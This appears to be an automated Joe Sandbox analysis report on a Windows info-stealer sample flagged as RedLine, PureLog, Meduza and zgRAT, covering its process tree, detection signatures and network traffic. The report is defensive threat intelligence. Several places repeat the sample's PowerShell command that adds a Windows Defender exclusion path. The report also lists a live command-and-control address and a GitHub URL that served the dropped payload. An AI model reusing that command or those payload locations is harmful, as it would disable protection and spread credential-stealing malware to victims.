Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9LrEuTWP8s.exe

Overview

General Information

Sample name:9LrEuTWP8s.exe
renamed because original name is a hash value
Original sample name:602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1.exe
Analysis ID:1554430
MD5:ba7d3bda1009e3900c1eca3d56aa8b4f
SHA1:3393a8485928315b58def904ccfb342ae1b30bdf
SHA256:602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1
Tags:4-251-123-83exeuser-JAMESWT_MHT
Infos:

Detection

Meduza Stealer, PureLog Stealer, RedLine, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Meduza Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9LrEuTWP8s.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\9LrEuTWP8s.exe" MD5: BA7D3BDA1009E3900C1ECA3D56AA8B4F)
    • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7740 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • uh3ex1.exe (PID: 8092 cmdline: "C:\Path1\To2\Save444\uh3ex1.exe" MD5: 50CA49634420336958CE73629D9A2CF6)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: RedLine

{"C2 url": "4.251.123.83:6677"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
            • 0x45c19:$s1: file:///
            • 0x45b51:$s2: {11111-22222-10009-11112}
            • 0x45ba9:$s3: {11111-22222-50001-00000}
            • 0x423fa:$s4: get_Module
            • 0x42864:$s5: Reverse
            • 0x45226:$s6: BlockCopy
            • 0x42c23:$s7: ReadByte
            • 0x45c2b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
            00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              6.2.uh3ex1.exe.6d5ab000.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                6.2.uh3ex1.exe.6d5ab000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  6.2.uh3ex1.exe.6d5ab000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    6.2.uh3ex1.exe.6d5ab000.4.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                    • 0x45c19:$s1: file:///
                    • 0x45b51:$s2: {11111-22222-10009-11112}
                    • 0x45ba9:$s3: {11111-22222-50001-00000}
                    • 0x423fa:$s4: get_Module
                    • 0x42864:$s5: Reverse
                    • 0x45226:$s6: BlockCopy
                    • 0x42c23:$s7: ReadByte
                    • 0x45c2b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                    8.2.MSBuild.exe.f00000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      Click to see the 11 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9LrEuTWP8s.exe", ParentImage: C:\Users\user\Desktop\9LrEuTWP8s.exe, ParentProcessId: 7620, ParentProcessName: 9LrEuTWP8s.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', ProcessId: 7740, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9LrEuTWP8s.exe", ParentImage: C:\Users\user\Desktop\9LrEuTWP8s.exe, ParentProcessId: 7620, ParentProcessName: 9LrEuTWP8s.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', ProcessId: 7740, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9LrEuTWP8s.exe", ParentImage: C:\Users\user\Desktop\9LrEuTWP8s.exe, ParentProcessId: 7620, ParentProcessName: 9LrEuTWP8s.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', ProcessId: 7740, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T14:50:35.772200+010020460561A Network Trojan was detected4.251.123.836677192.168.2.949709TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T14:50:35.062136+010020460451A Network Trojan was detected192.168.2.9497094.251.123.836677TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Path1\To2\Save444\uh3ex1.exeAvira: detection malicious, Label: HEUR/AGEN.1311038
                      Found malware configuration
                      Source: MSBuild.exe.8184.8.memstrminMalware Configuration Extractor: RedLine {"C2 url": "4.251.123.83:6677"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Path1\To2\Save444\uh3ex1.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\gdi32.dllReversingLabs: Detection: 83%
                      Multi AV Scanner detection for submitted file
                      Source: 9LrEuTWP8s.exeReversingLabs: Detection: 47%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                      Source: C:\Path1\To2\Save444\uh3ex1.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: 9LrEuTWP8s.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49708 version: TLS 1.2
                      Source: 9LrEuTWP8s.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Bootcherito\source\repos\ConsoleApp2\ConsoleApp2\obj\Release\ConsoleApp2.pdb source: 9LrEuTWP8s.exe
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D59C108 FindFirstFileExW,6_2_6D59C108

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.9:49709 -> 4.251.123.83:6677
                      Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 4.251.123.83:6677 -> 192.168.2.9:49709
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 4.251.123.83:6677
                      Source: global trafficTCP traffic: 192.168.2.9:49709 -> 4.251.123.83:6677
                      Source: global trafficTCP traffic: 192.168.2.9:64932 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: GET /Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
                      Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
                      Source: Joe Sandbox ViewIP Address: 4.251.123.83 4.251.123.83
                      Source: Joe Sandbox ViewASN Name: LEVEL3US LEVEL3US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: global trafficHTTP traffic detected: GET /Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                      Source: MSBuild.exe, 00000008.00000002.1669008971.0000000006381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.000000000337A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qpC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.000000000337A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qpC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb(;0 equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: github.com
                      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                      Source: powershell.exe, 00000003.00000002.1472919395.0000000002F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://objects.githubusercontent.com
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://objects.githubusercontent.comd
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
